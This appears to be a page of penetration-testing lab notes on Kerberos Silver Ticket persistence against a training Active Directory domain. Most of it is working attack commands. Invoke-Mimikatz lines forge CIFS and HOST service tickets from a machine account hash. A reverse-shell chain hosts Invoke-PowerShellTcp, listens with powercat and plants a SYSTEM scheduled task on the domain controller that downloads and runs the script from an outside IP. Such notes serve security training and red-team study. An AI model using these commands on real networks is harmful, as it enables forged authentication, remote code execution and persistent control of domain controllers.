Persistence - Silver Ticket

A valid TGS (Golden ticket is TGT).

• Encrypted and Signed by the NTLM hash of the service account (Golden ticket is signed by hash of krbtgt) of the service running with that account.

• Services rarely check PAC (Privileged Attribute Certificate).

• Services will allow access only to the services themselves.

• Reasonable persistence period (default 30 days for computer accounts).

Silver Ticket

  • requirements:

  • Need to have Domain Admin Acess on DC

#Using hash of the Domain Controller computer account, below
#command provides access to shares on the DC.

Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:2723620aa872abc65ea53178070f4bc7 /user:Administrator /ptt"'

#Similar command can be used for any other service on a machine.
Which services? SPN: HOST, RPCSS, WSMAN and many more.

Reverse Shell Silver Ticket with HOST

#Create Silver ticker for HOST
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST /rc4:2723620aa872abc65ea53178070f4bc7 /user:Administrator /ptt"'


#See if you have access
schtasks /s dcorp-dc.dollarcorp.moneycorp.local 

#edit Invoke-PowerShellTcp.ps1 or Invoke-PowerShellTcpOneLine.ps1
#add the following at the end of the file
Invoke-PowerShellTcp -Reverse -IPAddress <localIP> -Port 443


#Host the edited Invoke-PowerShellTcp.ps1 with HFS:
https://www.rejetto.com/hfs/?f=dl

#listen with Powercat
powercat -l -v -p 443 -t 1000

#Schedule a task
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local /SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.29/Invoke-PowerShellTcp.ps1''')'"


#Run The task
schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"

Last updated

Was this helpful?